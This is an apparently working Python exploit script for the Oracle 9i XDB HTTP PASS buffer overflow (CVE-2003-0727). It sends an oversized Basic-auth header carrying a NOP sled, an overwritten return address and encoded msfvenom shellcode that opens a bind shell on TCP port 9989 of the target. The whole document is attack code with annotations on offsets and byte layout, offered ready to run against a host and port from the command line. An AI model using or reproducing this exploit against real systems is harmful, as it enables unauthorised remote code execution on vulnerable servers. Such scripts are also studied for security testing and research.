#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow
#Date: 09/25/2017
#Exploit Author: Charles Dardaman
#Twitter: https://twitter.com/CharlesDardaman
#Website: http://www.dardaman.com
#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow
#Date: 09/25/2017
#Exploit Author: Charles Dardaman
#Twitter: https://twitter.com/CharlesDardaman
#Website: http://www.dardaman.com
#Version:9.2.0.1
#Tested on: Windows 2000 SP4
#CVE: CVE-2003-0727
#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/

#!/usr/bin/python
# NOTE: a shebang is only honoured on the first line of a file; placed here it
# is a plain comment. Invoke explicitly: python <this file> <target ip> <target port>.
# The script was written for Python 2 (plain str literals are sent on the wire).


import socket, sys, base64

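#usage: python oracle9i_xdb_pass.py <target ip> <target port>

# Fail with a usage line instead of an IndexError / ValueError traceback when
# the two positional arguments are missing or the port is not numeric.
if len(sys.argv) != 3 or not sys.argv[2].isdigit():
    sys.exit("usage: %s <target ip> <target port>" % sys.argv[0])

rhost = sys.argv[1]       #target ip
rport = int(sys.argv[2])  #target port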

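#Variables:
# All buffers are bytes literals so the same source runs under Python 2 (where
# b"" is str) and Python 3 (where the socket/base64 APIs require bytes).

# 0x60616d46 in little-endian form — the value written over the saved return
# address. It is specific to the build named in the header (Oracle 9.2.0.1 on
# Windows 2000 SP4); which module/gadget it points at is not recorded here, so
# re-verify it against the target before use.
ret = b"\x46\x6d\x61\x60"

# x86 NOP, used for the slides below.
nop = b"\x90"

# Prepended to the shellcode. Decodes as `add esp, 0xffffefff` (81 c4 ff ef ff ff)
# followed by `inc esp` (44), i.e. esp -= 0x1000 before the decoder runs —
# presumably so the decoder stub's own stack writes cannot land on the
# shellcode it is unpacking (TODO confirm against the crash state).
pre = b"\x81\xc4\xff\xef\xff\xff\x44"

# msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b "\x00" -e x86/shikata_ga_nai
# 355 bytes of encoded shellcode (NUL-free). This is a *bind* shell: after
# exploitation the target listens on TCP 9989 for anyone who can reach it,
# not only this host — firewall/clean up accordingly.
payload = pre + (
    b"\xba\x64\xdb\x93\xe7\xda\xd6\xd9\x74\x24\xf4\x58\x29"
    b"\xc9\xb1\x53\x31\x50\x12\x83\xc0\x04\x03\x34\xd5\x71"
    b"\x12\x48\x01\xf7\xdd\xb0\xd2\x98\x54\x55\xe3\x98\x03"
    b"\x1e\x54\x29\x47\x72\x59\xc2\x05\x66\xea\xa6\x81\x89"
    b"\x5b\x0c\xf4\xa4\x5c\x3d\xc4\xa7\xde\x3c\x19\x07\xde"
    b"\x8e\x6c\x46\x27\xf2\x9d\x1a\xf0\x78\x33\x8a\x75\x34"
    b"\x88\x21\xc5\xd8\x88\xd6\x9e\xdb\xb9\x49\x94\x85\x19"
    b"\x68\x79\xbe\x13\x72\x9e\xfb\xea\x09\x54\x77\xed\xdb"
    b"\xa4\x78\x42\x22\x09\x8b\x9a\x63\xae\x74\xe9\x9d\xcc"
    b"\x09\xea\x5a\xae\xd5\x7f\x78\x08\x9d\xd8\xa4\xa8\x72"
    b"\xbe\x2f\xa6\x3f\xb4\x77\xab\xbe\x19\x0c\xd7\x4b\x9c"
    b"\xc2\x51\x0f\xbb\xc6\x3a\xcb\xa2\x5f\xe7\xba\xdb\xbf"
    b"\x48\x62\x7e\xb4\x65\x77\xf3\x97\xe1\xb4\x3e\x27\xf2"
    b"\xd2\x49\x54\xc0\x7d\xe2\xf2\x68\xf5\x2c\x05\x8e\x2c"
    b"\x88\x99\x71\xcf\xe9\xb0\xb5\x9b\xb9\xaa\x1c\xa4\x51"
    b"\x2a\xa0\x71\xcf\x22\x07\x2a\xf2\xcf\xf7\x9a\xb2\x7f"
    b"\x90\xf0\x3c\xa0\x80\xfa\x96\xc9\x29\x07\x19\xd2\xac"
    b"\x8e\xff\x76\xbf\xc6\xa8\xee\x7d\x3d\x61\x89\x7e\x17"
    b"\xd9\x3d\x36\x71\xde\x42\xc7\x57\x48\xd4\x4c\xb4\x4c"
    b"\xc5\x52\x91\xe4\x92\xc5\x6f\x65\xd1\x74\x6f\xac\x81"
    b"\x15\xe2\x2b\x51\x53\x1f\xe4\x06\x34\xd1\xfd\xc2\xa8"
    b"\x48\x54\xf0\x30\x0c\x9f\xb0\xee\xed\x1e\x39\x62\x49"
    b"\x05\x29\xba\x52\x01\x1d\x12\x05\xdf\xcb\xd4\xff\x91"
    b"\xa5\x8e\xac\x7b\x21\x56\x9f\xbb\x37\x57\xca\x4d\xd7"
    b"\xe6\xa3\x0b\xe8\xc7\x23\x9c\x91\x35\xd4\x63\x48\xfe"
    b"\xf4\x81\x58\x0b\x9d\x1f\x09\xb6\xc0\x9f\xe4\xf5\xfc"
    b"\x23\x0c\x86\xfa\x3c\x65\x83\x47\xfb\x96\xf9\xd8\x6e"
    b"\x98\xae\xd9\xba"
)

# The Basic-auth credential is "user:password"; "AAAA" is the user and
# everything after the colon is the oversized password that overflows.
# Offsets within the credential:
#   0     "AAAA:"
#   5     442 x 'B'      filler up to the saved return address
#   447   eb 64          jmp short +0x64: lands inside the 266-byte NOP slide
#   449   90 90          padding
#   451   ret            overwritten return address (4 bytes)
#   455   266 x NOP      slide
#   721   eb 10          jmp short +0x10 into the next slide
#   723   109 x NOP      slide into the shellcode
#   832   payload        pre + encoded bind shell (362 bytes)
#   1194  NOP pad        to a fixed 400-byte tail (negative counts yield b"")
# Presumably execution resumes at the first jmp once ret is taken; the jmps
# hop over the pointer bytes rather than executing them (TODO confirm).
exploit = (
    b"AAAA:"
    + b"B" * 442
    + b"\xeb\x64"
    + nop * 2
    + ret
    + nop * 266
    + b"\xeb\x10"
    + nop * 109
    + payload
    + nop * (400 - len(payload))
)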


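# Build a minimal HTTP/1.1 request carrying the overflow in the Basic
# Authorization header. The request line and each header MUST be terminated
# by CRLF, with an empty line ending the header block — joined by spaces the
# server sees one malformed request line and never parses the Authorization
# header. Host/port come from the command line and are ASCII-encoded so the
# request is bytes under both Python 2 and 3.
request = (
    b"GET / HTTP/1.1\r\n"
    + b"Host: " + rhost.encode("ascii") + b":" + str(rport).encode("ascii") + b"\r\n"
    + b"Authorization: Basic " + base64.b64encode(exploit) + b"\r\n\r\n"
)

print("Attacking " + rhost + ":" + str(rport))

#Connect to the target and send the exploit.
# sendall() loops until the whole request is written; send() may return after
# a partial write and silently truncate the base64 blob. The timeout stops the
# script hanging forever on an unreachable host; the socket is always closed.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
try:
    s.connect((rhost, rport))
    s.sendall(request)
finally:
    s.close()

# 9989 is the lport baked into the msfvenom bind-shell payload above.
print("Try to connect on port 9989.")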